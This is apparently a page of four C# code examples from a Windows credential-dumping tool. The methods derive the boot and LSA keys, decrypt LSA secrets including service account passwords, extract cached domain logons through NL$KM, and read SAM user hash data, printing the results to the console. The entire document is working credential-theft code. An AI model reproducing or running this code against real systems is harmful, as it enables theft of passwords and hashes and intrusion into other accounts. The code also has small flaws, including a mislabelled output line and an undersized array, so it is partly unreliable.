Example #1
0
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        internal CacheDump()
        {
            String logonCount = (String)Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "CachedLogonsCount");

            Console.WriteLine("[*] {0} Cached Logons Set", logonCount);

            Byte[] bootKey = LSASecrets.GetBootKey();
            Console.WriteLine("[+] BootKey : " + BitConverter.ToString(bootKey).Replace("-", ""));
            Byte[] lsaKey = LSASecrets.GetLsaKey(bootKey);
            Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(lsaKey).Replace("-", ""));
            Byte[] nlkm = GetNlkm(lsaKey);
            Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(nlkm).Replace("-", ""));
            GetCache(nlkm);
        }
Example #2
0
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        internal void DumpLSASecrets()
        {
            Console.WriteLine("[*] Reading Secrets Key: SECURITY\\Policy\\Secrets");
            String[] secretSubKeys = Registry.LocalMachine.OpenSubKey(@"SECURITY\Policy\Secrets").GetSubKeyNames();
            if (secretSubKeys.Length <= 0)
            {
                Console.WriteLine("[-] [-] Reading Secrets key failed");
                return;
            }

            Byte[] bootKey = GetBootKey();
            Console.WriteLine("[+] BootKey : " + BitConverter.ToString(bootKey).Replace("-", ""));
            Byte[] lsaKey = GetLsaKey(bootKey);
            Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(lsaKey).Replace("-", ""));

            foreach (String secret in secretSubKeys)
            {
                Byte[] managedArray    = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SECURITY\Policy\Secrets\" + secret + "\\CurrVal", "");
                Byte[] decryptedSecret = DecryptLsa(managedArray, lsaKey);

                String serviceName = "";
                String userName    = "";
                String password    = "";
                if (secret == "$MACHINE.ACC" || secret == "NL$KM" || secret == "DPAPI_SYSTEM")
                {
                    serviceName = secret;
                    password    = BitConverter.ToString(decryptedSecret.Skip(16).Take((Int32)decryptedSecret[0]).ToArray());
                }
                else if (secret.Substring(0, 4) == "_SC_")
                {
                    serviceName = secret.Substring(4, secret.Length - 4);
                    userName    = (String)Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SYSTEM\CurrentControlSet\Services\" + serviceName, "ObjectName");
                    password    = ParseDecrypted(decryptedSecret);
                }
                else
                {
                    serviceName = secret;
                    password    = ParseDecrypted(decryptedSecret);
                }
                String result = String.Format("{0,-30} {1,-20} {2,-20}\n", serviceName, userName, password);
                Console.WriteLine(result);
            }
        }
Example #3
0
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        internal UserKeys[] GetUserHashes(Byte[] hBootKey)
        {
            int     size = 0;
            UIntPtr hKey = new UIntPtr();
            Int32   type = 0;
            Dictionary <Int32, String> ridMapping = new Dictionary <Int32, String>();

            String[] namesSubKeys = Registry.LocalMachine.OpenSubKey(@"SAM\SAM\Domains\Account\Users\Names").GetSubKeyNames();
            foreach (String name in namesSubKeys)
            {
                if (advapi32.RegOpenKeyEx(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\Names\" + name, 0, Reg.KEY_QUERY_VALUE, out hKey) != 0)
                {
                    Console.WriteLine("[-] Error opening key '{0}\\{1}", @"SAM\SAM\Domains\Account\Users\Names\" + name, "");
                    return(null);
                }
                if (advapi32.RegQueryValueEx(hKey, "", 0, ref type, IntPtr.Zero, ref size) != 0)
                {
                    Console.WriteLine("[-] [-] Error querying value '{0}\\{1}", @"SAM\SAM\Domains\Account\Users\Names\" + name, "");
                    return(null);
                }
                ridMapping[type] = name;
            }

            String[]   secretSubKeys = Registry.LocalMachine.OpenSubKey(@"SAM\SAM\Domains\Account\Users").GetSubKeyNames();
            UserKeys[] userKeys      = new UserKeys[secretSubKeys.Length - 1];
            for (Int32 i = 0; i < secretSubKeys.Length; i++)
            {
                if (secretSubKeys[i] != "Names")
                {
                    userKeys[i].rid              = Int32.Parse(secretSubKeys[i], System.Globalization.NumberStyles.HexNumber);
                    userKeys[i].userName         = ridMapping[userKeys[i].rid];
                    userKeys[i].f                = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i], "F");
                    userKeys[i].v                = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i], "V");
                    userKeys[i].userPasswordHint = (Byte[])Registry.LocalMachine.OpenSubKey(@"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i]).GetValue("UserPasswordHint");
                    //userKeys[i].userPasswordHint = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i], "UserPasswordHint");
                }
            }
            return(userKeys);
        }
Example #4
0
 ////////////////////////////////////////////////////////////////////////////////
 //
 ////////////////////////////////////////////////////////////////////////////////
 private static Byte[] GetNlkm(Byte[] lsaKey)
 {
     Byte[] encryptedNlkm = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SECURITY\Policy\Secrets\NL$KM\CurrVal", "");
     return(LSASecrets.DecryptLsa(encryptedNlkm, lsaKey));
 }